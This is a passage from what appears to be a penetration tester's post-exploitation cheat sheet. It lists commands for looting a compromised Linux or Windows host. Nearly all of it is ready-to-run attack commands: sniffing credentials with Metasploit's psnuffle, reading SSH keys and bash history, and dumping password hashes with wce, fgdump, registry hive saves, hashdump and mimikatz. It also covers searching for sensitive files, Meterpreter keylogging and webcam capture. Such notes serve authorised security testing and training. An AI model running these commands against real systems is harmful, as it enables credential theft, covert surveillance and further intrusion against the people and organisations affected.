# msfconsole module: passively sniffs credentials (FTP, POP3, IMAP, HTTP, ...) off the wire
use auxiliary/sniffer/psnuffle

# Also check per-user files
~/.ssh/
~/.bash_history
```
1979 |
1980 | ### Databases
1981 |
1982 | ### SSH-Keys
1983 |
1984 | ### Browser
1985 |
1986 | ### Mail
1987 |
1988 | ```
1989 | /var/mail
1990 | /var/spool/mail
1991 | ```
1992 |
1993 | ### GUI
1994 |
If there is a GUI, check the browser as well (saved passwords, history, cookies). These variables tell you which desktop session is running:
1996 |
1997 | ```
1998 | echo $DESKTOP_SESSION
1999 | echo $XDG_CURRENT_DESKTOP
2000 | echo $GDMSESSION
2001 | ```
2002 |
2003 | ## Windows
2004 |
2005 | ### Proof
2006 | ```
2007 | hostname && whoami.exe && type proof.txt && ipconfig /all
2008 | ```
2009 |
2010 | ### Passwords and hashes
2011 |
```
wce32.exe -w
wce64.exe -w
fgdump.exe

# Loot password hashes without tools (needs admin): save the SAM, SECURITY and SYSTEM hives
# and extract the hashes offline on the attack machine (e.g. impacket's secretsdump.py with LOCAL)
reg.exe save hklm\sam c:\sam_backup
reg.exe save hklm\security c:\security_backup
reg.exe save hklm\system c:\system

# Meterpreter
hashdump
# On current Metasploit the mimikatz extension is replaced by kiwi: load kiwi, then creds_msv / creds_all
load mimikatz
msv
```
2027 |
2028 | ### Dualhomed
2029 |
2030 | ```
2031 | ipconfig /all
2032 | route print
2033 |
# Which other hosts this machine has talked to recently (ARP cache)
2035 | arp -a
2036 | ```
2037 |
2038 | ### Tcpdump
2039 |
2040 | ```
2041 | # Meterpreter
2042 | run packetrecorder -li
2043 | run packetrecorder -i 1
2044 | ```
2045 |
2046 | ### Interesting files
2047 |
```
#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
hashdump
# Keylogger: migrate into the target user's explorer.exe first to capture their keystrokes
keyscan_start
keyscan_dump
keyscan_stop
webcam_snap

# How to cat files in meterpreter (backslashes must be escaped)
cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt

# Recursive search (from a cmd shell)
dir /s
```
2070 |
--------------------------------------------------------------------------------